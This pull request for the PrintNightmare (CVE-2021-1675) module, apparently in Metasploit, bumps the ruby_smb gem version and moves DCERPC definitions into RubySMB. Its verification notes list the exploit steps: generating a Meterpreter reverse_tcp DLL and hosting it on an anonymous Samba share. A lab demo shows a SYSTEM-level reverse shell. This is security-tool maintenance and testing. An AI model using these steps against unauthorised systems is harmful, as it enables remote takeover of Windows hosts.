### PR TITLE
Update PrintNightmare to use the moved DCERPC definitions

### DIFF
--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -436,7 +436,7 @@ GEM
     ruby-progressbar (1.11.0)
     ruby-rc4 (0.1.5)
     ruby2_keywords (0.0.5)
-    ruby_smb (3.0.1)
+    ruby_smb (3.0.2)
       bindata
       openssl-ccm
       openssl-cmac

--- a/LICENSE_GEMS
+++ b/LICENSE_GEMS
@@ -161,7 +161,7 @@ ruby-prof, 1.4.2, "Simplified BSD"
 ruby-progressbar, 1.11.0, MIT
 ruby-rc4, 0.1.5, MIT
 ruby2_keywords, 0.0.5, "ruby, Simplified BSD"
-ruby_smb, 3.0.1, "New BSD"
+ruby_smb, 3.0.2, "New BSD"
 rubyntlm, 0.6.3, MIT
 rubyzip, 2.3.2, "Simplified BSD"
 sawyer, 0.8.2, MIT


### PR DESCRIPTION
This updates the PrintNightmare module to use the updated DCERPC definitions in their final home over in RubySMB. When this module was first written, they were added directly to the module because the NDR structs were undergoing a redesign which has since been finished. Moving these definitions over into RubySMB ensures that they can be reused in other modules and components.

The module should function exactly as it did before.

Requires:
* rapid7/ruby_smb#191 (Done).

## Verification
(Copied from the original PR #15385).

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] `use auxiliary/admin/dcerpc/cve_2021_1675_printnightmare`
- [ ] Set the `RHOST` and `DLL_PATH` options
    - [ ] When setting `UDLL_PATH` use an x64 Meterpreter DLL
    - [ ] `use payload/windows/x64/meterpreter/reverse_tcp`
    - [ ] Set your options then `to_handler` and `generate -f dll -o /path/to/save/it.dll`
- [ ] Make sure the DLL for the UNC_PATH is hosted on an SMB3 compatible server if you're targeting a newer version of Windows like Server 2019, I used and recommend Samba

### Samba Configuration
For your convenience, this is the section I used in the samba configuration to host the DLL with anonymous access.

```
[public]
	comment = Public Directories
	path = /var/public
	guest ok = Yes
```

## Demo
```
msf6 auxiliary(admin/dcerpc/cve_2021_1675_printnightmare) > run
[*] Running module against 192.168.159.96

[*] 192.168.159.96:445 - Running automatic check ("set AutoCheck false" to disable)
[*] 192.168.159.96:445 - Target environment: Windows v10.0.17763 (x64)
[*] 192.168.159.96:445 - Enumerating the installed printer drivers...
[*] 192.168.159.96:445 - Retrieving the path of the printer driver directory...
[+] 192.168.159.96:445 - The target is vulnerable. Received ERROR_BAD_NET_NAME, implying the target is vulnerable.
[*] 192.168.159.96:445 - The named pipe connection was broken, reconnecting after a 10 second delay.
[*] Sending stage (200262 bytes) to 192.168.159.96
[*] 192.168.159.96:445 - The named pipe connection was broken, reconnecting after a 10 second delay.
[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.96:50736 ) at 2022-01-31 13:56:33 -0500

[-] 192.168.159.96:445 - Auxiliary aborted due to failure: unreachable: Failed to reconnect to the named pipe.
[*] Auxiliary module execution completed
msf6 auxiliary(admin/dcerpc/cve_2021_1675_printnightmare) > 
msf6 auxiliary(admin/dcerpc/cve_2021_1675_printnightmare) > sessions -i -1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > 
```